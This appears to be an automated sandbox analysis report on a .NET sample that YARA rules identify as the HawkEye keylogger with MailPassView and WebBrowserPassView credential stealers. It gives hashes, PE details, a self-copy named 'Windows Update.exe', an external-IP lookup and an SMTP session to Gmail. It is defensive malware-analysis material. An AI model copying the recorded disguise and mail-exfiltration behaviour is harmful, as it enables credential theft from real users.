                                                                                SHA-512:8F474385AB39E7D6E2A314C91E0452F23BFE19F4E79739D8DAA8E6B1187AB289562EBA6795834CA4744C6EF000CEBA41D0448DADFA233AE332BA89EF03E2B9E3
                                                                                Malicious:false
                                                                                Preview: 2360
                                                                                C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):49
                                                                                Entropy (8bit):4.505229681327448
                                                                                Encrypted:false
                                                                                SSDEEP:3:oNXp4EaKC59KYr4a:oNPaZ534a
                                                                                MD5:08300E5B4297843953DCBA97B84FC23F
                                                                                SHA1:0B3D9411DED86F59DAF4BD11A563357DE2BDFB1E
                                                                                SHA-256:6903CCA5237DD33175367A846A971979FF15CC5823135182E00A57F69A856C9A
                                                                                SHA-512:8C9124CC2258559A2377EB95EC9EB400EE568A133F946FDF7F69BB42A081DA90DFC7F2C544FBDD01AF6A4C235CAF654A0044ACE00835F91FCCDDDAF5F7F579E9
                                                                                Malicious:false
                                                                                Preview: C:\Users\user\AppData\Roaming\Windows Update.exe

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):6.5061470317531676
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.65%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • InstallShield setup (43055/19) 0.21%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                File name:Sample_B.exe
                                                                                File size:533504
                                                                                MD5:78300bd48d50fa7e5f3f6a933cc5f739
                                                                                SHA1:03157f27b0d5141465adeeaf9b3a7b5f3e60f614
                                                                                SHA256:424212e76c0e660538ee49126079980b34f4dd343e002004f67ea71a937af5e3
                                                                                SHA512:18b015ca0b4de297195e97ba95872c1485fe55a1d89b7fbdd82769a912e0fbb3825975105e5712356ffed525516d7ef3f482f46ce873e9b4315956f2e2a491e7
                                                                                SSDEEP:6144:1ulqe1RKbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9e:MRKQtqB5urTIoYWBQk1E+VF9mOx9Oi
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:41455554545445a2

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x480dee
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x6016C109 [Sun Jan 31 14:39:05 2021 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:v2.0.50727
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x80d940x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x3200.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x7edf40x7ee00False0.572546567118data6.53992282183IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x820000x32000x3200False0.105390625data3.5876692887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x860000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_ICON0x824f00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2004318071, next used block 4286019447
                                                                                RT_ICON0x827d80x128GLS_BINARY_LSB_FIRST
                                                                                RT_ICON0x829000x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                RT_ICON0x831a80x568GLS_BINARY_LSB_FIRST
                                                                                RT_ICON0x837100x353PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                RT_ICON0x83a680x10a8data
                                                                                RT_ICON0x84b100x468GLS_BINARY_LSB_FIRST
                                                                                RT_GROUP_ICON0x84f780x68data
                                                                                RT_VERSION0x822500x2a0data
                                                                                RT_MANIFEST0x84fe00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0000 0x04b0
                                                                                LegalCopyrightCopyright 2014
                                                                                Assembly Version1.0.0.0
                                                                                InternalNamePhulli.exe
                                                                                FileVersion1.0.0.0
                                                                                ProductNamePhulli
                                                                                ProductVersion1.0.0.0
                                                                                FileDescriptionPhulli
                                                                                OriginalFilenamePhulli.exe

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                02/17/21-14:15:57.240377TCP1201ATTACK-RESPONSES 403 Forbidden8049167104.16.155.36192.168.2.22

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 17, 2021 14:15:57.146359921 CET4916780192.168.2.22104.16.155.36
                                                                                Feb 17, 2021 14:15:57.187491894 CET8049167104.16.155.36192.168.2.22
                                                                                Feb 17, 2021 14:15:57.187669992 CET4916780192.168.2.22104.16.155.36
                                                                                Feb 17, 2021 14:15:57.188503981 CET4916780192.168.2.22104.16.155.36
                                                                                Feb 17, 2021 14:15:57.229413033 CET8049167104.16.155.36192.168.2.22
                                                                                Feb 17, 2021 14:15:57.240376949 CET8049167104.16.155.36192.168.2.22
                                                                                Feb 17, 2021 14:15:57.445694923 CET4916780192.168.2.22104.16.155.36
                                                                                Feb 17, 2021 14:15:58.263657093 CET4916780192.168.2.22104.16.155.36
                                                                                Feb 17, 2021 14:15:58.304943085 CET8049167104.16.155.36192.168.2.22
                                                                                Feb 17, 2021 14:15:58.305743933 CET4916780192.168.2.22104.16.155.36
                                                                                Feb 17, 2021 14:15:58.591355085 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:58.643999100 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:58.644090891 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:58.753774881 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:58.768049955 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:58.820581913 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:58.823973894 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:58.825731993 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:58.878711939 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:58.978893995 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.032215118 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.032260895 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.032417059 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.050864935 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.103605032 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.300400972 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.548762083 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.601639032 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.603857994 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.656851053 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.658803940 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:15:59.716787100 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.991312027 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:15:59.991817951 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.044337034 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.044538975 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.044905901 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.097799063 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.099353075 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.157800913 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.401359081 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.404243946 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.404728889 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.405162096 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.405478001 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:00.457525969 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.457547903 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.457556963 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.457802057 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:00.896564007 CET5874916866.102.1.108192.168.2.22
                                                                                Feb 17, 2021 14:16:01.110186100 CET49168587192.168.2.2266.102.1.108
                                                                                Feb 17, 2021 14:16:17.157942057 CET49168587192.168.2.2266.102.1.108

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 17, 2021 14:15:56.602780104 CET5219753192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:15:56.659929991 CET53521978.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:15:57.036444902 CET5309953192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:15:57.088181019 CET53530998.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:15:58.301774025 CET5283853192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:15:58.366976023 CET53528388.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:15:58.371413946 CET5283853192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:15:58.437342882 CET53528388.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:15:58.455055952 CET5283853192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:15:58.511831045 CET53528388.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:15:58.518007994 CET5283853192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:15:58.580215931 CET53528388.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:16:00.139292002 CET6120053192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:16:00.199146986 CET53612008.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:16:00.212182999 CET4954853192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:16:00.263868093 CET53495488.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:16:01.086823940 CET5562753192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:16:01.135674953 CET53556278.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:16:01.143835068 CET5600953192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:16:01.195561886 CET53560098.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:16:01.475300074 CET6186553192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:16:01.542368889 CET53618658.8.8.8192.168.2.22
                                                                                Feb 17, 2021 14:16:01.552608967 CET5517153192.168.2.228.8.8.8
                                                                                Feb 17, 2021 14:16:01.611363888 CET53551718.8.8.8192.168.2.22

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Feb 17, 2021 14:15:56.602780104 CET192.168.2.228.8.8.80x26aeStandard query (0)163.190.5.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                Feb 17, 2021 14:15:57.036444902 CET192.168.2.228.8.8.80x80acStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.301774025 CET192.168.2.228.8.8.80xdcd3Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.371413946 CET192.168.2.228.8.8.80xdcd3Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.455055952 CET192.168.2.228.8.8.80xdcd3Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.518007994 CET192.168.2.228.8.8.80xdcd3Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Feb 17, 2021 14:15:56.659929991 CET8.8.8.8192.168.2.220x26aeName error (3)163.190.5.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                Feb 17, 2021 14:15:57.088181019 CET8.8.8.8192.168.2.220x80acNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:57.088181019 CET8.8.8.8192.168.2.220x80acNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.366976023 CET8.8.8.8192.168.2.220xdcd3No error (0)smtp.gmail.com66.102.1.108A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.437342882 CET8.8.8.8192.168.2.220xdcd3No error (0)smtp.gmail.com66.102.1.108A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.511831045 CET8.8.8.8192.168.2.220xdcd3No error (0)smtp.gmail.com66.102.1.108A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:15:58.580215931 CET8.8.8.8192.168.2.220xdcd3No error (0)smtp.gmail.com66.102.1.108A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:16:01.135674953 CET8.8.8.8192.168.2.220x92f1No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:16:01.135674953 CET8.8.8.8192.168.2.220x92f1No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:16:01.195561886 CET8.8.8.8192.168.2.220x1175No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                Feb 17, 2021 14:16:01.195561886 CET8.8.8.8192.168.2.220x1175No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • whatismyipaddress.com

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.2249167104.16.155.3680C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 17, 2021 14:15:57.188503981 CET0OUTGET / HTTP/1.1
                                                                                Host: whatismyipaddress.com
                                                                                Connection: Keep-Alive
                                                                                Feb 17, 2021 14:15:57.240376949 CET1INHTTP/1.1 403 Forbidden
                                                                                Date: Wed, 17 Feb 2021 13:15:57 GMT
                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                Content-Length: 16
                                                                                Connection: keep-alive
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Set-Cookie: __cfduid=df511a3b29767e188cc5ceb9545d8c6061613567757; expires=Fri, 19-Mar-21 13:15:57 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                                                cf-request-id: 0851bb23a500004a8588a22000000001
                                                                                Server: cloudflare
                                                                                CF-RAY: 622fc7b2aa474a85-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                Data Ascii: error code: 1020


                                                                                SMTP Packets

                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                Feb 17, 2021 14:15:58.753774881 CET5874916866.102.1.108192.168.2.22220 smtp.gmail.com ESMTP c3sm3856483wrr.29 - gsmtp
                                                                                Feb 17, 2021 14:15:58.768049955 CET49168587192.168.2.2266.102.1.108EHLO 376483
                                                                                Feb 17, 2021 14:15:58.823973894 CET5874916866.102.1.108192.168.2.22250-smtp.gmail.com at your service, [84.17.52.38]
                                                                                250-SIZE 35882577
                                                                                250-8BITMIME
                                                                                250-STARTTLS
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-PIPELINING
                                                                                250-CHUNKING
                                                                                250 SMTPUTF8
                                                                                Feb 17, 2021 14:15:58.825731993 CET49168587192.168.2.2266.102.1.108STARTTLS
                                                                                Feb 17, 2021 14:15:58.878711939 CET5874916866.102.1.108192.168.2.22220 2.0.0 Ready to start TLS

                                                                                Code Manipulations

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: Sample_B.exe PID: 2368 Parent PID: 2956

                                                                                General

                                                                                Start time:14:15:32
                                                                                Start date:17/02/2021
                                                                                Path:C:\Users\user\Desktop\Sample_B.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\Sample_B.exe'
                                                                                Imagebase:0xbc0000
                                                                                File size:533504 bytes
                                                                                MD5 hash:78300BD48D50FA7E5F3F6A933CC5F739
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:low

                                                                                Chronological Activities

                                                                                Analysis Process: Windows Update.exe PID: 2360 Parent PID: 2368

                                                                                General

                                                                                Start time:14:15:35
                                                                                Start date:17/02/2021
                                                                                Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\AppData\Roaming\Windows Update.exe'
                                                                                Imagebase:0xee0000
                                                                                File size:533504 bytes
                                                                                MD5 hash:78300BD48D50FA7E5F3F6A933CC5F739
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.2112485117.0000000003371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.2113607102.00000000046F0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.2113562918.00000000046E0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
